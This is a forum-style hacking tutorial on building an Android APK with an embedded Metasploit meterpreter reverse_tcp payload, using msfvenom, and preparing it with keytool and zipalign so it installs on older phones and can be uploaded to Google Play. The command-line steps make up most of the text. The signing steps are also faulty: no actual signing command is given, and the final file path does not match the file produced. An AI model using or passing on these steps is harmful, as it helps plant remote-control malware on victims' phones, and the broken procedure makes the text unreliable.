HOW TO Sign the APK File with Embedded Payload 

Hi MoboTherapy families welcome back

Today, I`m gonna show you: "How To Sign the APK File with Embedded Payload". I made this cause many of you asked me to solve  this error (This was built an older version of android and may not work properly.) The following Methods work 100%. So, Follow the steps carefully.

If you asked me why we have to sign the Apk file and here is why 

In Modern Android Phones, Unsigned APK files can be Easily installed. But Older versions of Android does not Support the installation of Unsigned APK files. This is not a common Problem. But for Publishers and Hackers, it can create a lot of problem, because Unsigned APK files give error on Older Android Versions & cannot be EVEN Uploaded on Google Play or Play Store.

To Manually & Properly Sign the APK, you have to Follow the Following steps Carefully!

Let's begin...

• Requirements

1). Kali Linux (Latest Version is Preferred)
2). ava v8 or above (Latest Version is Preferred)

3). ZipAlign Tool (Download it HERE , Install instructions included)

• Installation

1). Latest version of JAVA is already installed in Kali Linux. So you don`t need to download it Manually.

2). Zip-Align Tool can be found HERE. Installation instructions are Discussed there. If you have any Problems, you can install by type these commands

1. Update the package index:

    # sudo apt-get update

      

      2. Install zipalign deb package    

    # sudo apt-get install zipalign 

OR

1. Update the package index:

   # sudo apt-get update

2. Install google-android-build-tools-installer deb package:

   # sudo apt-get install google-android-build-tools-installer

3). Here I am gonna Generate a Key named key.jks for Kali.apk , which is already generated by msfvenom command

• Signing the APK File Manually

1). First, generate an Un-Signed APK File with Embedded Payload:

msfvenom -p android/meterpreter/reverse_tcp LHOST=(your-IP) LPORT=(desired-port) R > Kali.apk

2.) Now we are gonna Generate a key key.jks with KeyTool. For this, type in Terminal (screenshot Below):

 

  keytool -genkey -v -keystore key.jks -keyalg RSA -keysize 2048 -validity 10000 -alias my-alias

3). Enter a Rememberable KeyStore Password. (i.e. 123456)

4). Now, it will ask about your Personnel Information. Just Randomly fill the Form (i.e. like I do it above in the screenshot), and finally Type: yes , This will Successfully Generate a key.

5). BINGO...!!!!!!!! APK file has been signed. Now the most important step; Zip Aligning is Left, Just type the following command in terminal, and GET the Signed Kali.apk:

zipalign -v 4 Kali.apk Kali-Signed.apk

                                            DONE 

 You have Successfully Generated SIGNED APK 

                                             FILE

Location

Your Manually SIGNED Apk File, with Embedded Payload can be found here :

/root/payloadapk-Signed.apk

Note: This all about, there are many methods in the internet  this is not the only one you can check them if this method isn't satisfied you. I hope you can solve your problem and enjoy thank you.

DISCLAIMER : This Thread is only for Education Purposes. I will not be Responsible of Any Illegal use of this information. Try not to HACK the Androids, other than your`s.